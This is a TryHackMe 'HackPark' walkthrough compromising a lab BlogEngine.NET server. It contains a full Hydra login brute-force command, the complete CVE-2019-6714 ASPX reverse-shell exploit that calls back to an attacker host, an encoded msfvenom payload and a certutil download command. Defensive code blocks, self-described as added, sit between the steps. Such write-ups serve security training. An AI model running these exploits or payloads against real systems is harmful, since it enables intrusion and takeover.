Categories: walkthrough
Tags: tryhackme, thm, Windows-Machine, bruteforce, login-bruteforce, hydra, CVE-2019-6714, BlogEngine, PrivEsc-Windows, PrivEsc, DLL-Hijacking, Juicy-Potato
$ nmap -p0-65535 10.10.88.187 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 17:01 IST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.73% done; ETC: 17:06 (0:03:52 remaining)
Nmap scan report for 10.10.88.187
Host is up (0.17s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 216.20 seconds
$ nmap -sV -sC -p80,3389 10.10.88.187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 17:07 IST
Nmap scan report for 10.10.88.187
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2021-06-30T11:22:49
|_Not valid after: 2021-12-30T11:22:49
|_ssl-date: 2021-07-01T11:37:45+00:00; -4s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -4s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.07 seconds
When we inspect the pages, nothing useful is found. Injection attacks on the input forms did not yield any results either.
From the URL, we can observe that one of the parameters is admin.
Let's use it as the username and try a brute-force attack.
Using Burp
Using one of the password lists from SecLists, we got the password 1qaz2wsx.
Using Hydra
$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/worst-passwords-2017-top100-slashdata.txt 10.10.88.187 http-post-form '/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=qRY6dWng1F0cvqSV%2B4mQfRmxND5Ksw%2F6QtVhc%2FlkK3Vze3sRlKmX4tRKwROr3YZ%2Fa%2FwPPHHBDTmbZMGyqx3xjyB8518U%2F3xHggxcrZ%2BsYOK2OOyWTkNa1cwmJuDw1zkcwpzMRThR1PK3cMJ1%2BRZVuFz41QR4mLQ9jiBDS6rJG0oLSXO9trFqrxZhCzdGQ9NikJJhbEbkNLQdSVipgvGTYZ1lXqYfp%2BtJ4F43RqGZFrbPC6%2B2qFb7DPSU%2BlTzrX9wghEicFDp5T7RjuPMpXBgsylp7dSQB8ytzrrj0T%2BwfKQQuo1vJrLdUx%2Ff64MiEMuQ1pm%2FkGp7Hdu71TpshTI3D8SfmTCOXBPJEkztx%2FU8SZ4HOTiy&__EVENTVALIDATION=R%2BihqyiDlyMMnTQiDQbY83J%2FICfBn9zcT1n09t%2FNzwUShryVjKW8K7ix2NU2GcsolWVjNwNUPoEFuONe7nCT3ZY9ul6zQiwlKAn53pdKEiUv9w4PXuXvzemSpYtaeUxuw%2FhRD%2B4vf7Is5h5%2Fdw4mLLawu9Vk8MKPMEfrI226GwQVZCei&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-01 19:53:13
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:1/p:100), ~7 tries per task
[DATA] attacking http-post-form://10.10.88.187:80/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=qRY6dWng1F0cvqSV%2B4mQfRmxND5Ksw%2F6QtVhc%2FlkK3Vze3sRlKmX4tRKwROr3YZ%2Fa%2FwPPHHBDTmbZMGyqx3xjyB8518U%2F3xHggxcrZ%2BsYOK2OOyWTkNa1cwmJuDw1zkcwpzMRThR1PK3cMJ1%2BRZVuFz41QR4mLQ9jiBDS6rJG0oLSXO9trFqrxZhCzdGQ9NikJJhbEbkNLQdSVipgvGTYZ1lXqYfp%2BtJ4F43RqGZFrbPC6%2B2qFb7DPSU%2BlTzrX9wghEicFDp5T7RjuPMpXBgsylp7dSQB8ytzrrj0T%2BwfKQQuo1vJrLdUx%2Ff64MiEMuQ1pm%2FkGp7Hdu71TpshTI3D8SfmTCOXBPJEkztx%2FU8SZ4HOTiy&__EVENTVALIDATION=R%2BihqyiDlyMMnTQiDQbY83J%2FICfBn9zcT1n09t%2FNzwUShryVjKW8K7ix2NU2GcsolWVjNwNUPoEFuONe7nCT3ZY9ul6zQiwlKAn53pdKEiUv9w4PXuXvzemSpYtaeUxuw%2FhRD%2B4vf7Is5h5%2Fdw4mLLawu9Vk8MKPMEfrI226GwQVZCei&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.88.187 login: admin password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-01 19:53:18
Username: admin
Password: 1qaz2wsx
We can use these credentials in the login form; we are greeted with the Administrator Dashboard.
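The Hydra run above produced 100 login POSTs in about five seconds, and that shape is easy to see from the server side. The script below is an added defensive example (not code from the original post): it walks IIS W3C log records, keeps a sliding window of login POSTs per client, and flags clients that exceed a threshold, noting whether the burst ended in a redirect. The log lines, the 60 s window and the threshold of 20 are constructed here and are not values from the page; the field list is assumed to match the `#Fields:` header in the sample.

```python
"""Flag login-form brute forcing in IIS W3C logs.

Added defensive example for the Hydra run above; not code from the original
post. It assumes W3C logging with the fields named in the #Fields: header of
the constructed sample, a 60 s window and a threshold of 20 POSTs; those
numbers are choices made here, not values from the page.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/Account/login.aspx"     # BlogEngine login page targeted in the walkthrough
WINDOW = timedelta(seconds=60)
THRESHOLD = 20                         # login POSTs from one client inside WINDOW


def parse_w3c(text):
    """Yield one dict per record, keyed by the names from the #Fields: line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_login_bursts(text, window=WINDOW, threshold=THRESHOLD):
    """Return [(client_ip, first_seen_iso, post_count, got_redirect)] for every
    client that POSTs to the login page at least `threshold` times within
    `window`. got_redirect is True if a 302 followed: in ASP.NET forms auth a
    failed login re-renders the form (200) while success redirects (302), so a
    burst of 200s ending in a 302 is the signature of a guessed password."""
    recent = defaultdict(deque)   # c-ip -> timestamps of its login POSTs in window
    flagged = {}                  # c-ip -> [first_seen, count, got_redirect]
    for rec in parse_w3c(text):
        if rec["cs-uri-stem"] != LOGIN_PATH or rec["cs-method"] != "POST":
            continue
        ip = rec["c-ip"]
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if ip in flagged:
            flagged[ip][1] += 1
            flagged[ip][2] |= rec["sc-status"] == "302"
        elif len(q) >= threshold:
            flagged[ip] = [q[0], len(q), rec["sc-status"] == "302"]
    return [(ip, first.isoformat(), n, hit) for ip, (first, n, hit) in flagged.items()]


def _burst(ip, start, n, step_ms, last_status="200"):
    """Constructed lines: n login POSTs from ip, step_ms apart; the last one gets last_status."""
    return [
        f"{start + timedelta(milliseconds=i * step_ms):%Y-%m-%d %H:%M:%S} 10.10.88.187 "
        f"POST {LOGIN_PATH} ReturnURL=%2fadmin%2f 80 {ip} "
        f"{last_status if i == n - 1 else '200'}"
        for i in range(n)
    ]


# Constructed IIS log: one human mistyping twice and then succeeding (must not be
# flagged), followed by a 100-guess burst over 5 s like the Hydra run, ending in a 302.
SAMPLE_LOG = "\n".join(
    [
        "#Software: Microsoft Internet Information Services 8.5",
        "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status",
        "2021-07-01 14:22:00 10.10.88.187 GET / - 80 10.11.39.1 200",
        f"2021-07-01 14:22:30 10.10.88.187 POST {LOGIN_PATH} ReturnURL=%2fadmin%2f 80 10.11.39.1 200",
        f"2021-07-01 14:22:45 10.10.88.187 POST {LOGIN_PATH} ReturnURL=%2fadmin%2f 80 10.11.39.1 200",
        f"2021-07-01 14:23:01 10.10.88.187 POST {LOGIN_PATH} ReturnURL=%2fadmin%2f 80 10.11.39.1 302",
    ]
    + _burst("10.11.39.244", datetime(2021, 7, 1, 14, 23, 13), 100, 50, "302")
)

if __name__ == "__main__":
    for ip, first, n, hit in find_login_bursts(SAMPLE_LOG):
        print(f"{ip}: {n} login POSTs starting {first}, redirect seen: {hit}")
```

The window is sliding rather than per-minute bucketed so a burst straddling a minute boundary is still caught; the status-code check is what separates "someone is guessing" from "someone guessed right", which changes the response from blocking an IP to resetting a password and reviewing what the admin account did next.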
RDP is not vulnerable
$ nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.10.88.187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 19:07 IST
Nmap scan report for 10.10.88.187
Host is up (0.36s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
|_ RDSTLS: SUCCESS
Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds
We could brute force RDP too, but it may lead to account lockouts. Let's keep this as a last resort.
As we examine the Administrator Dashboard, in the About page we can find the BlogEngine.NET version number: 3.3.6.0.
With some Google dorking, we find that this version is vulnerable to remote code execution via directory traversal (CVE-2019-6714).
Let's use this exploit code to get our shell.
Payload code:
# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714

/*
 * CVE-2019-6714
 *
 * Path traversal vulnerability leading to remote code execution. This
 * vulnerability affects BlogEngine.NET versions 3.3.6 and below. This
 * is caused by an unchecked "theme" parameter that is used to override
 * the default theme for rendering blog pages. The vulnerable code can
 * be seen in this file:
 *
 * /Custom/Controls/PostList.ascx.cs
 *
 * Attack:
 *
 * First, we set the TcpClient address and port within the method below to
 * our attack host, who has a reverse tcp listener waiting for a connection.
 * Next, we upload this file through the file manager. In the current (3.3.6)
 * version of BlogEngine, this is done by editing a post and clicking on the
 * icon that looks like an open file in the toolbar. Note that this file must
 * be uploaded as PostView.ascx. Once uploaded, the file will be in the
 * /App_Data/files directory off of the document root. The admin page that
 * allows upload is:
 *
 * http://10.10.10.10/admin/app/editor/editpost.cshtml
 *
 *
 * Finally, the vulnerability is triggered by accessing the base URL for the
 * blog with a theme override specified like so:
 *
 * http://10.10.10.10/?theme=../../App_Data/files
 *
 */
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
            using(System.IO.Stream stream = client.GetStream()) {
                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);
                    StringBuilder strInput = new StringBuilder();
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();
                    while(true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();
        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
Tweak the payload (set the TcpClient address and port to your listener) and save it as PostView.ascx.
Upload the file through the post editor at this URL:
http://10.10.88.187/admin/app/editor/editpost.cshtml
Start the listener, then browse to this URL to get the reverse shell on the listener:
http://10.10.88.187/?theme=../../App_Data/files
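The root cause named in the exploit header is a `theme` parameter spliced into a file path without validation, so two `..` segments walk from the themes folder back to the web root and into `App_Data/files`. The Python below is an added educational example, not BlogEngine.NET's code: it reproduces that shape in a resolver, then shows the hardened version a maintainer would write (allow-listed name, existence check, and a containment check after symlinks are resolved). The `Custom/Themes/<name>/PostView.ascx` layout and the `Standard`/`Dark` theme names are assumptions, built in a temporary directory.

```python
"""Unchecked 'theme' override versus an allow-listed one.

Added educational example for the CVE-2019-6714 discussion; not BlogEngine.NET's
code. The <webroot>/Custom/Themes/<name>/PostView.ascx layout and the theme
names are assumptions, constructed in a temp dir by demo().
"""
import os
import re
import shutil
import tempfile

THEMES_SUBDIR = ("Custom", "Themes")           # assumed layout: <webroot>/Custom/Themes/<name>/
THEME_NAME = re.compile(r"[A-Za-z0-9_-]+")     # a theme is a plain folder name, nothing else


def resolve_theme_vulnerable(webroot, theme):
    """The bug's shape: the request parameter is spliced into the path unchecked,
    so theme='../../App_Data/files' selects <webroot>/App_Data/files/PostView.ascx."""
    return os.path.normpath(os.path.join(webroot, *THEMES_SUBDIR, theme, "PostView.ascx"))


def resolve_theme_hardened(webroot, theme, default="Standard"):
    """Three independent checks: the name must match an allow-list pattern, the
    resolved file must exist, and it must still sit inside the themes folder
    after symlinks are followed. Anything else falls back to the default theme."""
    themes_dir = os.path.realpath(os.path.join(webroot, *THEMES_SUBDIR))
    if not theme or not THEME_NAME.fullmatch(theme):
        theme = default
    candidate = os.path.realpath(os.path.join(themes_dir, theme, "PostView.ascx"))
    inside = os.path.commonpath([themes_dir, candidate]) == themes_dir
    if not (inside and os.path.isfile(candidate)):
        candidate = os.path.join(themes_dir, default, "PostView.ascx")
    return candidate


def demo():
    """Build a constructed web root in a temp dir and report what each resolver
    does with the traversal value used in the walkthrough."""
    root = tempfile.mkdtemp()
    try:
        for rel in ("Custom/Themes/Standard/PostView.ascx",
                    "Custom/Themes/Dark/PostView.ascx",
                    "App_Data/files/PostView.ascx"):     # stands in for the uploaded control
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()
        themes_dir = os.path.realpath(os.path.join(root, *THEMES_SUBDIR))
        uploaded = os.path.realpath(os.path.join(root, "App_Data", "files", "PostView.ascx"))
        traversal = "../../App_Data/files"

        def inside_themes(p):
            return os.path.commonpath([themes_dir, os.path.realpath(p)]) == themes_dir

        vuln = resolve_theme_vulnerable(root, traversal)
        safe = resolve_theme_hardened(root, traversal)
        return {
            "vulnerable_inside_themes": inside_themes(vuln),
            "vulnerable_hits_uploaded_file": os.path.realpath(vuln) == uploaded,
            "hardened_inside_themes": inside_themes(safe),
            "hardened_uses_default": safe == os.path.join(themes_dir, "Standard", "PostView.ascx"),
            "hardened_accepts_real_theme": resolve_theme_hardened(root, "Dark").endswith(
                os.path.join("Dark", "PostView.ascx")),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

The allow-list regex alone stops the traversal; the containment check is kept because it also covers the case where a theme folder is later replaced by a symlink, and falling back to the default theme (rather than raising) avoids turning a bad parameter into an error page an attacker can probe.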
Getting a Proper Stabilized Shell
Create a payload using msfvenom
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.39.244 LPORT=9866 -f exe -o revshell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: revshell.exe
Copy it to the target
c:\Users\Public>certutil -urlcache -f http://10.11.39.244:8991/revshell.exe revshell.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
Grabbing the shell
Using winPEAS to check for possible PrivEsc tactics
By running winPEAS, we learn that the SystemScheduler folder is readable and writable by Everyone.
We can try to stop the service so that we can perform a DLL hijacking PrivEsc.
After searching through the different logs in the SystemScheduler folder, we find that Message.exe is restarted every 30 seconds.
As the SystemScheduler folder has world r/w access, let's create a payload for a privileged shell.
Uploading the shell to the target
On the listener, we got the connection
Getting User flag
Getting Root flag
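winPEAS surfaced the permissive ACL on the SystemScheduler folder; the same condition is what a defender should be hunting for across every service install directory. The script below is an added defensive example (not the post's code and not winPEAS): it parses the text that `icacls <dir>` prints and reports broad principals (Everyone, Users, Authenticated Users) that hold write, modify or full rights, skipping deny ACEs. The two `icacls` outputs and the `C:\Program Files (x86)\SystemScheduler` install path are constructed here; the page does not give the folder's full path.

```python
"""Spot service folders that low-privileged principals can write to.

Added defensive example for the winPEAS finding above; not the post's code and
not winPEAS. It parses the text `icacls <dir>` prints. The sample outputs and
the SystemScheduler install path are constructed here, not taken from the page.
"""
import re

# One icacls ACE: <principal>:(flag)(flag)...   e.g.  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([^()]*\))+)\s*$")

# Simple and specific rights that let a principal create or replace files.
WRITE_FLAGS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO"}

# Principals that effectively mean "any local user".
BROAD_PRINCIPALS = {
    "everyone", "builtin\\users", "users",
    "nt authority\\authenticated users", "authenticated users",
    "nt authority\\interactive",
}


def parse_icacls(path, output):
    """Return [(principal, set_of_flags)] from the `icacls path` output for one path.
    icacls prints the path and the first ACE on one line, then one ACE per line."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):          # first line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                                       # blank line or summary line
        flags = set(re.findall(r"\(([^()]*)\)", m.group("flags")))
        flags |= {f for grp in flags for f in grp.split(",")}   # expand "(RD,WD)" style groups
        aces.append((m.group("who"), flags))
    return aces


def writable_by_low_priv(path, output):
    """Findings: [(principal, sorted_write_flags)] for broad principals holding
    write rights; deny ACEs are ignored. An empty list means the folder looks safe."""
    findings = []
    for who, flags in parse_icacls(path, output):
        if "DENY" in flags or who.lower() not in BROAD_PRINCIPALS:
            continue
        hits = sorted(flags & WRITE_FLAGS)
        if hits:
            findings.append((who, hits))
    return findings


# Constructed sample 1: the shape winPEAS complained about (Everyone has Full).
SCHEDULER_DIR = r"C:\Program Files (x86)\SystemScheduler"   # assumed install path
SAMPLE_BAD = r"""C:\Program Files (x86)\SystemScheduler Everyone:(OI)(CI)(F)
                                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                       BUILTIN\Administrators:(I)(OI)(CI)(F)
                                       BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample 2: a correctly locked-down service folder.
GOOD_DIR = r"C:\Program Files\ExampleService"
SAMPLE_GOOD = r"""C:\Program Files\ExampleService NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                BUILTIN\Administrators:(I)(OI)(CI)(F)
                                BUILTIN\Users:(I)(OI)(CI)(RX)
                                Everyone:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for d, out in ((SCHEDULER_DIR, SAMPLE_BAD), (GOOD_DIR, SAMPLE_GOOD)):
        print(d, "->", writable_by_low_priv(d, out) or "no broad write access")
```

In practice the folder list comes from the ImagePath of each service (`sc qc` or the registry), and the fix is to remove the broad ACE and let Administrators and SYSTEM keep full control, which is what the locked-down sample shows.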
The host is vulnerable to the Juicy Potato attack too.
More about the Juicy Potato attack can be found in the Alfred walkthrough.